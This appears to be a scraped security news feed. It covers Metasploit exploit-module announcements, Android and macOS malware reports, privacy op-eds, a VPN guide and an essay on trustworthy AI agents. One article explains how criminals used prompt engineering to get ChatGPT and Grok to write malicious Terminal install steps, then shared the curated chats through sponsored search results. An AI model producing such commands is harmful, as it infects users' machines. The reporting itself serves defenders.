Normal view
Apple Issues Security Updates After Two WebKit Flaws Found Exploited in the Wild
Metasploit Wrap-Up 12/12/2025
React2shell Module
As you may have heard, on December 3, 2025, the React team announced a critical Remote Code Execution (RCE) vulnerability in servers using the React Server Components (RSC) Flight protocol. The vulnerability, tracked as CVE-2025-55182, carries a CVSS score of 10.0 and is informally known as "React2Shell". It allows attackers to achieve prototype pollution during deserialization of RSC payloads by sending specially crafted multipart requests with "proto", "constructor", or "prototype" as module names. We're happy to announce that community contributor vognik submitted an exploit module for React2Shell which landed earlier this week and is included in this week's release.
MSSQL Improvements
Over the past couple of weeks Metasploit has made a couple of key improvements to the framework’s MSSQL attack capabilities. The first (PR 20637) is a new NTLM relay module, auxiliary/server/relay/smb_to_mssql, which enables users to start a malicious SMB server that will relay authentication attempts to one or more target MSSQL servers. When successful, the Metasploit operator will have an interactive session to the MSSQL server that can be used to run interactive queries, or MSSQL auxiliary modules.
Building on this work, it became clear that users would need to interact with MSSQL servers that required encryption as many do in hardened environments. To achieve that objective, issue 18745 was closed by updating Metasploits MSSQL protocol library to offer better encryption support. Now, Metasploit users can open interactive sessions to servers that offer and even require encrypted connections. This functionality is available automatically in the auxiliary/scanner/mssql/mssql_login and new auxiliary/server/relay/smb_to_mssql modules.
New module content (5)
Magento SessionReaper
Authors: Blaklis, Tomais Williamson, and Valentin Lobstein chocapikk@leakix.net
Type: Exploit
Pull request: #20725 contributed by Chocapikk
Path:multi/http/magento_sessionreaper
AttackerKB reference: CVE-2025-54236
Description: This adds a new exploit module for CVE-2025-54236 (SessionReaper), a critical vulnerability in Magento/Adobe Commerce that allows unauthenticated remote code execution. The vulnerability stems from improper handling of nested deserialization in the payment method context, combined with an unauthenticated file upload endpoint.
Unauthenticated RCE in React and Next.js
Authors: Lachlan Davidson, Maksim Rogov, and maple3142
Type: Exploit
Pull request: #20760 contributed by sfewer-r7
Path: multi/http/react2shell_unauth_rce_cve_2025_55182
AttackerKB reference: CVE-2025-66478
Description: This adds an exploit for CVE-2025-55182 which is an unauthenticated RCE in React. This vulnerability has been referred to as React2Shell.
WordPress King Addons for Elementor Unauthenticated Privilege Escalation to RCE
Authors: Peter Thaleikis and Valentin Lobstein chocapikk@leakix.net
Type: Exploit
Pull request: #20746 contributed by Chocapikk
Path: multi/http/wp_king_addons_privilege_escalation
AttackerKB reference: CVE-2025-8489
Description: This adds an exploit module for CVE-2025-8489, an unauthenticated privilege escalation vulnerability in the WordPress King Addons for Elementor plugin (versions 24.12.92 to 51.1.14). The vulnerability allows unauthenticated attackers to create administrator accounts by specifying the user_role parameter during registration, enabling remote code execution through plugin upload.
Linux Reboot
Author: bcoles bcoles@gmail.com
Type: Payload (Single)
Pull request: #20682 contributed by bcoles
Path:linux/loongarch64/reboot
Description: This extends our payloads support to a new architecture, LoongArch64. The first payload introduced for this new architecture is the reboot payload, which will cause the target system to restart once triggered.
Enhanced Modules (2)
Modules which have either been enhanced, or renamed:
- #20736 from sfewer-r7 - This pull requests updates the exploit/linux/http/fortinet_fortiweb_rce module (added in https://github.com/rapid7/metasploit-framework/pull/20717) to add in support for older version of FortiWeb, versions 6.*, which are no longer under support from the vendor.
- #20747 from vognik - This adds an exploit for CVE-2025-55182 which is an unauthenticated RCE in React. This vulnerability has been referred to as React2Shell.
Enhancements and features (1)
- #20704 from dwelch-r7 - The module auxiliary/scanner/ssh/ssh_login_pubkey has been removed. Its functionality has been moved into auxiliary/scanner/ssh/ssh_login.
Documentation
You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro

The Autonomous MSSP: How to Turn XDR Volume into a Competitive Advantage
Turn XDR volume into revenue. Morpheus investigates 100% of alerts and triages 95% in under 2 minutes, letting MSSPs scale without adding headcount.
The post The Autonomous MSSP: How to Turn XDR Volume into a Competitive Advantage appeared first on D3 Security.
The post The Autonomous MSSP: How to Turn XDR Volume into a Competitive Advantage appeared first on Security Boulevard.
Friday Squid Blogging: Giant Squid Eating a Diamondback Squid
I have no context for this video—it’s from Reddit—but one of the commenters adds some context:
Hey everyone, squid biologist here! Wanted to add some stuff you might find interesting.
With so many people carrying around cameras, we’re getting more videos of giant squid at the surface than in previous decades. We’re also starting to notice a pattern, that around this time of year (peaking in January) we see a bunch of giant squid around Japan. We don’t know why this is happening. Maybe they gather around there to mate or something? who knows! but since so many people have cameras, those one-off monster-story encounters are now caught on video, like this one (which, btw, rips. This squid looks so healthy, it’s awesome)...
The post Friday Squid Blogging: Giant Squid Eating a Diamondback Squid appeared first on Security Boulevard.
Friday Squid Blogging: Giant Squid Eating a Diamondback Squid
I have no context for this video—it’s from Reddit—but one of the commenters adds some context:
Hey everyone, squid biologist here! Wanted to add some stuff you might find interesting.
With so many people carrying around cameras, we’re getting more videos of giant squid at the surface than in previous decades. We’re also starting to notice a pattern, that around this time of year (peaking in January) we see a bunch of giant squid around Japan. We don’t know why this is happening. Maybe they gather around there to mate or something? who knows! but since so many people have cameras, those one-off monster-story encounters are now caught on video, like this one (which, btw, rips. This squid looks so healthy, it’s awesome).
When we see big (giant or colossal) healthy squid like this, it’s often because a fisher caught something else (either another squid or sometimes an antarctic toothfish). The squid is attracted to whatever was caught and they hop on the hook and go along for the ride when the target species is reeled in. There are a few colossal squid sightings similar to this from the southern ocean (but fewer people are down there, so fewer cameras, fewer videos). On the original instagram video, a bunch of people are like “Put it back! Release him!” etc, but he’s just enjoying dinner (obviously as the squid swims away at the end).
As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.
NDSS 2025 – KernelSnitch: Side Channel-Attacks On Kernel Data Structures
Session 5D: Side Channels 1
Authors, Creators & Presenters: Lukas Maar (Graz University of Technology), Jonas Juffinger (Graz University of Technology), Thomas Steinbauer (Graz University of Technology), Daniel Gruss (Graz University of Technology), Stefan Mangard (Graz University of Technology)
PAPER
KernelSnitch: Side Channel-Attacks On Kernel Data Structures
The sharing of hardware elements, such as caches, is known to introduce microarchitectural side-channel leakage. One approach to eliminate this leakage is to not share hardware elements across security domains. However, even under the assumption of leakage-free hardware, it is unclear whether other critical system components, like the operating system, introduce software-caused side-channel leakage. In this paper, we present a novel generic software side-channel attack, KernelSnitch, targeting kernel data structures such as hash tables and trees. These structures are commonly used to store both kernel and user information, e.g., metadata for userspace locks. KernelSnitch exploits that these data structures are variable in size, ranging from an empty state to a theoretically arbitrary amount of elements. Accessing these structures requires a variable amount of time depending on the number of elements, i.e., the occupancy level. This variance constitutes a timing side channel, observable from user space by an unprivileged, isolated attacker. While the timing differences are very low compared to the syscall runtime, we demonstrate and evaluate methods to amplify these timing differences reliably. In three case studies, we show that KernelSnitch allows unprivileged and isolated attackers to leak sensitive information from the kernel and activities in other processes. First, we demonstrate covert channels with transmission rates up to 580 kbit/s. Second, we perform a kernel heap pointer leak in less than 65 s by exploiting the specific indexing that Linux is using in hash tables. Third, we demonstrate a website fingerprinting attack, achieving an F1 score of more than 89 %, showing that activity in other user programs can be observed using KernelSnitch. Finally, we discuss mitigations for our hardware-agnostic attacks.
ABOUT NDSS
The Network and Distributed System Security Symposium (NDSS) fosters information exchange among researchers and practitioners of network and distributed system security. The target audience includes those interested in practical aspects of network and distributed system security, with a focus on actual system design and implementation. A major goal is to encourage and enable the Internet community to apply, deploy, and advance the state of available security technologies.
Our thanks to the Network and Distributed System Security (NDSS) Symposium for publishing their Creators, Authors and Presenter’s superb NDSS Symposium 2025 Conference content on the Organizations' YouTube Channel.
The post NDSS 2025 – KernelSnitch: Side Channel-Attacks On Kernel Data Structures appeared first on Security Boulevard.
LW ROUNDTABLE Part 2: Mandates surge, guardrails lag — intel from the messy middle
Regulators made their move in 2025.
Disclosure deadlines arrived. AI rules took shape. Liability rose up the chain of command. But for security teams on the ground, the distance between policy and practice only grew wider.
Part two of a … (more…)
The post LW ROUNDTABLE Part 2: Mandates surge, guardrails lag — intel from the messy middle first appeared on The Last Watchdog.
The post LW ROUNDTABLE Part 2: Mandates surge, guardrails lag — intel from the messy middle appeared first on Security Boulevard.
The CISO-COO Partnership: Protecting Operational Excellence
React2Shell Exploits Flood the Internet as Attacks Continue
Vibe Coding: Innovation Demands Vigilance
Microsoft Will Bundle Security Copilot With M365 Enterprise Licenses
Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads
New Android Malware Locks Device Screens and Demands a Ransom
![]()
Android Malware DroidLock Uses ‘Ransomware-like Overlay’
The researchers detailed the new Android malware in a blog post this week, noting that the malware “has the ability to lock device screens with a ransomware-like overlay and illegally acquire app lock credentials, leading to a total takeover of the compromised device.” The malware uses fake system update screens to trick victims and can stream and remotely control devices via virtual network computing (VNC). The malware can also exploit device administrator privileges to “lock or erase data, capture the victim's image with the front camera, and silence the device.” The infection chain starts with a dropper that appears to require the user to change settings to allow unknown apps to be installed from the source (image below), which leads to the secondary payload that contains the malware. [caption id="attachment_107722" align="aligncenter" width="300"]- Wiping data from the device, “effectively performing a factory reset.”
- Locking the device.
- Changing the PIN, password or biometric information to prevent user access to the device.
DroidLock Malware Overlays
The DroidLock malware uses Accessibility Services to launch overlays on targeted applications, prompted by an AccessibilityEvent originating from a package on the attacker's target list. The Android malware uses two primary overlay methods:- A Lock Pattern overlay that displays a pattern-drawing user interface (UI) to capture device unlock patterns.
- A WebView overlay that loads attacker-controlled HTML content stored locally in a database; when an application is opened, the malware queries the database for the specific package name, and if a match is found it launches a full-screen WebView overlay that displays the stored HTML.
What Tech Leaders Need to Know About MCP Authentication in 2025
MCP is transforming AI agent connectivity, but authentication is the critical gap. Learn about Shadow IT risks, enterprise requirements, and solutions.
The post What Tech Leaders Need to Know About MCP Authentication in 2025 appeared first on Security Boulevard.
Microsoft Expands its Bug Bounty Program to Include Third-Party Code
In a nod to the evolving threat landscape that comes with cloud computing and AI and the growing supply chain threats, Microsoft is broadening its bug bounty program to reward researchers who uncover threats to its users that come from third-party code, like commercial and open source software,
The post Microsoft Expands its Bug Bounty Program to Include Third-Party Code appeared first on Security Boulevard.
Funding of Israeli Cybersecurity Soars to Record Levels
Israeli cybersecurity firms raised $4.4B in 2025 as funding rounds jumped 46%. Record seed and Series A activity signals a maturing, globally dominant cyber ecosystem.
The post Funding of Israeli Cybersecurity Soars to Record Levels appeared first on Security Boulevard.
As Capabilities Advance Quickly OpenAI Warns of High Cybersecurity Risk of Future AI Models
OpenAI warns that frontier AI models could escalate cyber threats, including zero-day exploits. Defense-in-depth, monitoring, and AI security by design are now essential.
The post As Capabilities Advance Quickly OpenAI Warns of High Cybersecurity Risk of Future AI Models appeared first on Security Boulevard.
Three New React Vulnerabilities Surface on the Heels of React2Shell
CVE-2025-55183, CVE-2025-55184, and CVE-2025-67779 require immediate attention
The post Three New React Vulnerabilities Surface on the Heels of React2Shell appeared first on Security Boulevard.
Prompt Injection Can’t Be Fully Mitigated, NCSC Says Reduce Impact Instead
The NCSC warns prompt injection is fundamentally different from SQL injection. Organizations must shift from prevention to impact reduction and defense-in-depth for LLM security.
The post Prompt Injection Can’t Be Fully Mitigated, NCSC Says Reduce Impact Instead appeared first on Security Boulevard.
Cyber Risk is Business Risk: Embedding Resilience into Corporate Strategy
To transform cyber risk into economic advantage, leaders must treat cyber as a board-level business risk and rehearse cross-border incidents with partners to build trust.
The post Cyber Risk is Business Risk: Embedding Resilience into Corporate Strategy appeared first on Security Boulevard.
React Fixes Two New RSC Flaws as Security Teams Deal with React2Shell
As they work to fend off the rapidly expanding number of attempts by threat actors to exploit the dangerous React2Shell vulnerability, security teams are learning of two new flaws in React Server Components that could lead to denial-of-service attacks or the exposure of source code.
The post React Fixes Two New RSC Flaws as Security Teams Deal with React2Shell appeared first on Security Boulevard.
Building Trustworthy AI Agents
The promise of personal AI assistants rests on a dangerous assumption: that we can trust systems we haven’t made trustworthy. We can’t. And today’s versions are failing us in predictable ways: pushing us to do things against our own best interests, gaslighting us with doubt about things we are or that we know, and being unable to distinguish between who we are and who we have been. They struggle with incomplete, inaccurate, and partial context: with no standard way to move toward accuracy, no mechanism to correct sources of error, and no accountability when wrong information leads to bad decisions...
The post Building Trustworthy AI Agents appeared first on Security Boulevard.
Supply Chain Attacks Targeting GitHub Actions Increased in 2025
The US digital doxxing of H-1B applicants is a massive privacy misstep
Technology professionals hoping to come and work in the US face a new privacy concern. Starting December 15, skilled workers on H-1B visas and their families must flip their social media profiles to public before their consular interviews. It’s a deeply risky move from a security and privacy perspective.
According to a missive from the US State Department, immigration officers use all available information to vet newcomers for signs that they pose a threat to national security. That includes an “online presence review.” That review now requires not just H-1B applicants but also H-4 applicants (their dependents who want to move with them to the US) to “adjust the privacy settings on all of their social media profiles to ‘public.'”
An internal State Department cable obtained by CBS had sharper language: it instructs officers to screen for “any indications of hostility toward the citizens, culture, government, institutions, or founding principles of the United States.” What that means is unclear, but if your friends like posting strong political opinions, you should be worried.
This isn’t the first time that the government has forced people to lift the curtain on their private digital lives. The US State Department forced student visa applicants to make their social media profiles public in June this year.
This is a big deal for a lot of people. The H-1B program allows companies to temporarily hire foreign workers in specialty jobs. The US processed around 400,000 visas under the H-1B program last year, most of which were applications to renew employment, according to the Pew Research Center. When you factor in those workers’ dependents, we’re talking well over a million people. This decision forces them into long-term digital exposure that threatens not just them, but the US too.
Why forced public exposure is a security disaster
A lot of these H-1B workers work for defense contractors, chip makers, AI labs, and big tech companies. These are organizations that foreign powers (especially those hostile to the US) care a lot about, and that makes those H-1B employees primary targets for them.
Making H-1B holders’ real names, faces, and daily routines public is a form of digital doxxing. The policy exposes far more personal information than is safe, creating significant new risks.
This information gives these actors a free organizational chart, complete with up-to-date information on who’s likely to be working on chip designs and sensitive software.
It also gives the same people all they need to target people on that chart. They have information on H-1B holders and their dependents, including intelligence about their friends and family, their interests, their regular locations, and even what kinds of technology they use. They become more exposed to risks like SIM swapping and swatting.
This public information also turns employees into organizational attack vectors. Adversaries can use personal and professional data to enhance spear-phishing and business email compromise techniques that cost organizations dearly. Public social media content becomes training data for fraud, serving up audio and video that threat actors can use to create lifelike impersonations of company employees.
Social media profiles also give adversaries an ideal way to approach people. They have a nasty habit of exploiting social media to target assets for recruitment. The head of MI5 warned two years ago that Chinese state actors had approached an estimated 20,000 Britons via LinkedIn to steal industrial or technological secrets.
Armed with a deep, intimate understanding of what makes their targets tick, attackers stand a much better chance of co-opting them. One person might need money because of a gambling problem or a sick relative. Another might be lonely and a perfect target for a romance scam.
Or how about basic extortion? LGBTQ+ individuals from countries where homosexuality is criminalized risk exposure to regimes that could harm them when they return. Family in hostile countries become bargaining chips. In some regions, families of high-value employees could face increased exposure if this information becomes accessible. Foreign nation states are good at exploiting pain points. This policy means that they won’t have to look far for them.
Visa applications might assume they can simply make an account private again once officials have evaluated them. But adversary states to the US are actively seeking such information. They have vast online surveillance operations that scrape public social media accounts. As soon as they notice someone showing up in the US with H-1B visa status, they’ll be ready to mine account data that they’ve already scraped.
So what is an H-1B applicant to do? Deleting accounts is a bad idea, because sudden disappearance can trigger suspicion and officers may detect forensic traces. A safer approach is to pause new posting and carefully review older content before making profiles public. Removing or hiding posts that reveal personal routines, locations, or sensitive opinions reduces what can be taken out of context or used for targeting once accounts are exposed.
The irony is that spies are likely using fake social media accounts honed for years to slip under the radar. That means they’ll keep operating in the dark while legitimate H-1B applicants are the ones who become vulnerable. So this policy may unintentionally create the very risks it aims to prevent. And it also normalizes mandatory public exposure as a condition of government interaction.
We’re at a crossroads. Today, visa applicants, their families, and their employers are at risk. The infrastructure exists to expand this approach in the future. Or officials could stop now and rethink, before these risks become more deeply entrenched.
We don’t just report on threats – we help protect your social media
Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.
Are Trade Concerns Trumping US Cybersecurity?
Money Mules Require Banks to Switch from Defense to Offense
- EFF and 12 Organizations Urge UK Politicians to Drop Digital ID Scheme Ahead of Parliamentary Petition Debate
EFF and 12 Organizations Urge UK Politicians to Drop Digital ID Scheme Ahead of Parliamentary Petition Debate
The UK Parliament convened earlier this week to debate a petition signed by 2.9 million people calling for an end to the government’s plans to roll out a national digital ID. Ahead of that debate, EFF and 12 other civil society organizations wrote to politicians in the country urging MPs to reject the Labour government’s newly announced digital ID proposal.
The UK’s Prime Minister Keir Starmer pitched the scheme as a way to “cut the faff” in proving people’s identities by creating a virtual ID on personal devices with information like names, date of birth, nationality, photo, and residency status to verify their right to live and work in the country.
But the case for digital identification has not been made.
As we detail in our joint briefing, the proposal follows a troubling global trend: governments introducing expansive digital identity systems that are structurally incompatible with a rights-respecting democracy. The UK’s plan raises six interconnected concerns:
- Mission creep
- Infringements on privacy rights
- Serious security risks
- Reliance on inaccurate and unproven technologies
- Discrimination and exclusion
- The deepening of entrenched power imbalances between the state and the public.
Digital ID schemes don’t simply verify who you are—they redefine who can access services and what those services look like. They become a gatekeeper to essential societal infrastructure, enabling governments and state agencies to close doors as easily as they open them. And they disproportionately harm those already at society’s margins, including people seeking asylum and undocumented communities, who already face heightened surveillance and risk.
Even the strongest recommended safeguards cannot resolve the core problem: a mandatory digital ID scheme that shifts power dramatically away from individuals and toward the state. No one should be coerced—technically or socially—into a digital system in order to participate fully in public life. And at a time when almost 3 million people in the UK have called on politicians to reject this proposal, the government must listen to people and say no to digital ID.
Read our civil society briefing in full here.

New Advanced Phishing Kits Use AI and MFA Bypass Tactics to Steal Credentials at Scale
Black Hat Europe 2025: Reputation matters – even in the ransomware economy
Locks, SOCs and a cat in a box: What Schrödinger can teach us about cybersecurity
3 Compliance Processes to Automate in 2026
For years, compliance has been one of the most resource-intensive responsibilities for cybersecurity teams. Despite growing investments in tools, the day-to-day reality of compliance is still dominated by manual, duplicative tasks. Teams chase down screenshots, review spreadsheets, and cross-check logs, often spending weeks gathering information before an assessment or audit.
The post 3 Compliance Processes to Automate in 2026 appeared first on Security Boulevard.
PII in email: Explanation, risks, & protection
Understand what PII is, why email puts it at risk, and how your business can strengthen security to better protect sensitive information.
The post PII in email: Explanation, risks, & protection appeared first on Security Boulevard.
Google ads funnel Mac users to poisoned AI chats that spread the AMOS infostealer
Researchers have found evidence that AI conversations were inserted in Google search results to mislead macOS users into installing the Atomic macOS Stealer (AMOS). Both Grok and ChatGPT were found to have been abused in these attacks.
Forensic investigation of an AMOS alert showed the infection chain started when the user ran a Google search for “clear disk space on macOS.” Following that trail, the researchers found not one, but two poisoned AI conversations with instructions. Their testing showed that similar searches produced the same type of results, indicating this was a deliberate attempt to infect Mac users.
The search results led to AI conversations which provided clearly laid out instructions to run a command in the macOS Terminal. That command would end with the machine being infected with the AMOS malware.
If that sounds familiar, you may have read our post about sponsored search results that led to fake macOS software on GitHub. In that campaign, sponsored ads and SEO-poisoned search results pointed users to GitHub pages impersonating legitimate macOS software, where attackers provided step-by-step instructions that ultimately installed the AMOS infostealer.
As the researchers pointed out:
“Once the victim executed the command, a multi-stage infection chain began. The base64-encoded string in the Terminal command decoded to a URL hosting a malicious bash script, the first stage of an AMOS deployment designed to harvest credentials, escalate privileges, and establish persistence without ever triggering a security warning.”
This is dangerous for the user on many levels. Because there is no prompt or review, the user does not get a chance to see or assess what the downloaded script will do before it runs. It bypasses security because of the use of the command line, it can bypass normal file download protections and execute anything the attacker wants.
Other researchers have found a campaign that combines elements of both attacks: the shared AI conversation and fake software install instructions. They found user guides for installing OpenAI’s new Atlas browser for macOS through shared ChatGPT conversations, which in reality led to AMOS infections.
So how does this work?
The cybercriminals used prompt engineering to get ChatGPT to generate a step‑by‑step “installation/cleanup” guide which in reality will infect a system. ChatGPT’s sharing feature creates a public link to a single conversation that exists in the owner’s account. Attackers can craft a chat to produce the instructions they need and then tidy up the visible conversation so that what’s shared looks like a short, clean guide rather than a long back-and-forth.
Most major chat interfaces (including Grok on X) also let users delete conversations or selectively share screenshots. That makes it easy for criminals to present only the polished, “helpful” part of a conversation and hide how they arrived there.
The cybercriminals used prompt engineering to get ChatGPT to generate a step‑by‑step “installation/cleanup” guide that, in reality, installs malware. ChatGPT’s sharing feature creates a public link to a conversation that lives in the owner’s account. Attackers can curate their conversations to create a short, clean conversation which they can share.
Then the criminals either pay for a sponsored search result pointing to the shared conversation or they use SEO techniques to get their posts high in the search results. Sponsored search results can be customized to look a lot like legitimate results. You’ll need to check who the advertiser is to find out it’s not real.

From there, it’s a waiting game for the criminals. They rely on victims to find these AI conversations through search and then faithfully follow the step-by-step instructions.
How to stay safe
These attacks are clever and use legitimate platforms to reach their targets. But there are some precautions you can take.
- First and foremost, and I can’t say this often enough: Don’t click on sponsored search results. We have seen so many cases where sponsored results lead to malware, that we recommend skipping them or make sure you never see them. At best they cost the company you looked for money and at worst you fall prey to imposters.
- If you’re thinking about following a sponsored advertisement, check the advertiser first. Is it the company you’d expect to pay for that ad? Click the three‑dot menu next to the ad, then choose options like “About this ad” or “About this advertiser” to view the verified advertiser name and location.
- Use real-time anti-malware protection, preferably one that includes a web protection component.
- Never run copy-pasted commands from random pages or forums, even if they’re hosted on seemingly legitimate domains, and especially not commands that look like
curl … | bashor similar combinations.
If you’ve scanned your Mac and found the AMOS information stealer:
- Remove any suspicious login items, LaunchAgents, or LaunchDaemons from the Library folders to ensure the malware does not persist after reboot.
- If any signs of persistent backdoor or unusual activity remain, strongly consider a full clean reinstall of macOS to ensure all malware components are eradicated. Only restore files from known clean backups. Do not reuse backups or Time Machine images that may be tainted by the infostealer.
- After reinstalling, check for additional rogue browser extensions, cryptowallet apps, and system modifications.
- Change all the passwords that were stored on the affected system and enable multi-factor authentication (MFA) for your important accounts.
If all this sounds too difficult for you to do yourself, ask someone or a company you trust to help you—our support team is happy to assist you if you have any concerns.
We don’t just report on threats—we remove them
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
Building Trustworthy AI Agents
The promise of personal AI assistants rests on a dangerous assumption: that we can trust systems we haven’t made trustworthy. We can’t. And today’s versions are failing us in predictable ways: pushing us to do things against our own best interests, gaslighting us with doubt about things we are or that we know, and being unable to distinguish between who we are and who we have been. They struggle with incomplete, inaccurate, and partial context: with no standard way to move toward accuracy, no mechanism to correct sources of error, and no accountability when wrong information leads to bad decisions.
These aren’t edge cases. They’re the result of building AI systems without basic integrity controls. We’re in the third leg of data security—the old CIA triad. We’re good at availability and working on confidentiality, but we’ve never properly solved integrity. Now AI personalization has exposed the gap by accelerating the harms.
The scope of the problem is large. A good AI assistant will need to be trained on everything we do and will need access to our most intimate personal interactions. This means an intimacy greater than your relationship with your email provider, your social media account, your cloud storage, or your phone. It requires an AI system that is both discreet and trustworthy when provided with that data. The system needs to be accurate and complete, but it also needs to be able to keep data private: to selectively disclose pieces of it when required, and to keep it secret otherwise. No current AI system is even close to meeting this.
To further development along these lines, I and others have proposed separating users’ personal data stores from the AI systems that will use them. It makes sense; the engineering expertise that designs and develops AI systems is completely orthogonal to the security expertise that ensures the confidentiality and integrity of data. And by separating them, advances in security can proceed independently from advances in AI.
What would this sort of personal data store look like? Confidentiality without integrity gives you access to wrong data. Availability without integrity gives you reliable access to corrupted data. Integrity enables the other two to be meaningful. Here are six requirements. They emerge from treating integrity as the organizing principle of security to make AI trustworthy.
First, it would be broadly accessible as a data repository. We each want this data to include personal data about ourselves, as well as transaction data from our interactions. It would include data we create when interacting with others—emails, texts, social media posts—and revealed preference data as inferred by other systems. Some of it would be raw data, and some of it would be processed data: revealed preferences, conclusions inferred by other systems, maybe even raw weights in a personal LLM.
Second, it would be broadly accessible as a source of data. This data would need to be made accessible to different LLM systems. This can’t be tied to a single AI model. Our AI future will include many different models—some of them chosen by us for particular tasks, and some thrust upon us by others. We would want the ability for any of those models to use our data.
Third, it would need to be able to prove the accuracy of data. Imagine one of these systems being used to negotiate a bank loan, or participate in a first-round job interview with an AI recruiter. In these instances, the other party will want both relevant data and some sort of proof that the data are complete and accurate.
Fourth, it would be under the user’s fine-grained control and audit. This is a deeply detailed personal dossier, and the user would need to have the final say in who could access it, what portions they could access, and under what circumstances. Users would need to be able to grant and revoke this access quickly and easily, and be able to go back in time and see who has accessed it.
Fifth, it would be secure. The attacks against this system are numerous. There are the obvious read attacks, where an adversary attempts to learn a person’s data. And there are also write attacks, where adversaries add to or change a user’s data. Defending against both is critical; this all implies a complex and robust authentication system.
Sixth, and finally, it must be easy to use. If we’re envisioning digital personal assistants for everybody, it can’t require specialized security training to use properly.
I’m not the first to suggest something like this. Researchers have proposed a “Human Context Protocol” (https://papers.ssrn.com/sol3/ papers.cfm?abstract_id=5403981) that would serve as a neutral interface for personal data of this type. And in my capacity at a company called Inrupt, Inc., I have been working on an extension of Tim Berners-Lee’s Solid protocol for distributed data ownership.
The engineering expertise to build AI systems is orthogonal to the security expertise needed to protect personal data. AI companies optimize for model performance, but data security requires cryptographic verification, access control, and auditable systems. Separating the two makes sense; you can’t ignore one or the other.
Fortunately, decoupling personal data stores from AI systems means security can advance independently from performance (https:// ieeexplore.ieee.org/document/ 10352412). When you own and control your data store with high integrity, AI can’t easily manipulate you because you see what data it’s using and can correct it. It can’t easily gaslight you because you control the authoritative record of your context. And you determine which historical data are relevant or obsolete. Making this all work is a challenge, but it’s the only way we can have trustworthy AI assistants.
This essay was originally published in IEEE Security & Privacy.
NCSC Plugs Gap in Cyber-Deception Guidance
How private is your VPN?
When you’re shopping around for a Virtual Private Network (VPN) you’ll find yourself in a sea of promises like “military-grade encryption!” and “total anonymity!” You can’t scroll two inches without someone waving around these fancy terms.
But not all VPNs can be trusted. Some VPNs genuinely protect your privacy, and some only sound like they do.
With VPN usage rising around the world for streaming, travel, remote work, and basic digital safety, understanding what makes a VPN truly private matters more than ever.
After years of trying VPNs for myself, privacy-minded family members, and a few mission-critical projects, here’s what I wish everyone knew.
Why do you even need a VPN?
If you’re wondering whether a VPN is worth it, you’re not alone. As your privacy-conscious consumer advocate, let me break down three time-saving and cost-saving benefits of using a privacy-first VPN.
Keep your browsing private
Ever feel like someone’s always looking over your shoulder online? Without a VPN, your internet service provider, and sometimes websites or governments, can keep tabs on what you do. A VPN encrypts your traffic and swaps out your real IP address for one of its own, letting you browse, shop, and read without a digital paper trail following you around.
I’ve run into this myself while traveling. There were times when I needed a VPN just to access US or European web apps that were blocked in certain Asian countries. In other cases, I preferred to appear “based” in the US so that English-language apps would load naturally, instead of defaulting to the local language, currency, or content of the country I was visiting.
Watch what you want, but pay less
Some of your favorite shows and websites are locked away simply because of where you live. In many cases, subscription or pay-per-view prices are higher in more prosperous regions. With a VPN, you can connect to servers in other countries and unlock content that isn’t available at home.
For example, when All Elite Wrestling (AEW) announced its major 2022 pay-per-view featuring CM Punk vs. Jon Moxley, US fans paid $49.99 through Bleacher Report. Fans in the UK, meanwhile, watched the exact same event on FiteTV for $23 less, around half the price. Because platforms determine pricing based on your IP address, a VPN server in another region can show you the pricing available in that country. Savings like that can make a VPN pay for itself quickly.
Stay safe on coffee-shop Wi-Fi
Before you join a network named “Starbucks Guest WiFi,” remember that nothing stops a cybercriminal from broadcasting a hotspot with the same name. Public Wi-Fi is convenient, but it’s also one of the easiest places for someone to snoop on your traffic.
Connecting to your VPN immediately encrypts everything you send or receive. That means you can check email, pay bills, or browse privately without worrying about someone nearby intercepting your information. Getting compromised will cost far more in money, time, and stress than most privacy-first VPN subscriptions.
But what actually makes a VPN privacy-first?
For a VPN, “privacy-first” can’t be just a nice slogan. It’s a mindset that shapes every technical, business, and legal decision.
A privacy-first VPN:
- Collects as little data as possible — only the minimum needed to run the service.
- Enforces a real no-logs policy through design, not marketing.
- Builds privacy into everything, from software to server operations.
- Practices transparency, often through open-source components and independent audits.
If a VPN can’t explain how it handles these areas, that’s a red flag.
What is WireGuard and why is it such a big deal?
WireGuard isn’t a VPN service. It’s the protocol that powers many modern VPNs, including Malwarebytes Privacy VPN. It’s the engine that handles encryption and securely routes your traffic.
WireGuard is the superstar in the VPN world. Unlike clunkier, older protocols (like OpenVPN or IPSec) it’s deliberately lean and built for the modern internet. Its small codebase is easier to audit and leaves fewer places for bugs to hide. It’s fully open-source, so researchers can dig into exactly how it works.
Its cryptography is fast, efficient, and modern with strong encryption, solid key exchange, and lightweight hashing that reduces overhead. In practice, that means better privacy and better performance without a provider having to gather connection data just to keep speeds usable.
Of course, WireGuard is just the foundation. Each VPN implements it differently. The better ones add privacy-friendly tweaks like rotating IP addresses or avoiding static identifiers so that even they can’t link sessions back to individual users.
How to compare VPNs
With VPN usage rising, especially where new age-verification rules have sparked debate about whether VPNs might face future scrutiny, it’s more important than ever to choose providers with strong, transparent privacy practices.
When you boil it down, a handful of questions reveal almost everything about how a VPN treats your privacy:
- Who controls the infrastructure?
- Are the servers RAM-only?
- Which protocol is used, and how is it implemented?
- What laws apply to the company?
- Have experts audited the service?
- Do transparency reports or warrant canaries exist and stay updated?
- Can you sign up and pay without giving away your entire identity?
If a VPN provider gets evasive about any of this, or runs its service “for free” while collecting data to make the numbers work, that tells you almost everything you need to know.

Why infrastructure ownership matters
One of the most revealing questions you can ask is deceptively simple: Who actually owns the servers?
Most VPNs rent hardware from large data centers or cloud platforms. When they do, your traffic travels through machines managed not only by the VPN’s engineers, but also by whoever runs those facilities. That introduces an access question: Who else has their hands on the hardware?
When a VPN owns and operates its equipment, including racks and networking gear, it reduces the number of unknowns dramatically. The fewer third parties in the chain, the easier it is to stand behind privacy guarantees.
RAM-only (diskless) servers: the gold standard
RAM-only servers take this a step further. Because everything runs in memory, nothing is ever written to a hard drive. Pull the plug and the entire working state disappears instantly, like wiping a whiteboard clean. That means no logs sitting quietly on a disk, nothing for an intruder or authorities to seize, and nothing left behind if ownership, personnel, or legal circumstances change.
